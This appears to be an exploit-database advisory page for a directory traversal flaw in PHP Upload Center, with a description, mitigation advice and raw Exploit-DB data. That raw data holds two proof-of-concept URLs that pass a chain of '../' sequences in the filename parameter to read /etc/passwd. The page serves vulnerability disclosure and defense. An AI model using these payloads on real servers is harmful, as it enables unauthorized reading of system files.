header-logo
Suggest Exploit
vendor:
PHP Upload Center
by:
Unknown
9.8
CVSS
CRITICAL
Directory Traversal
22
CWE
Product Name: PHP Upload Center
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:php_upload_center:php_upload_center
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

PHP Upload Center Directory Traversal Vulnerability

PHP Upload Center is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. An attacker can exploit this issue to retrieve arbitrary remote files on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

Mitigation:

To mitigate this vulnerability, it is recommended to update PHP Upload Center to the latest version or apply a patch provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15621/info

PHP Upload Center is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this issue to retrieve arbitrary remote files on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

http://www.example.com/upload/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd
http://www.example.com/instaladores/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd

Navigation

Suggest Exploit

Services By CQR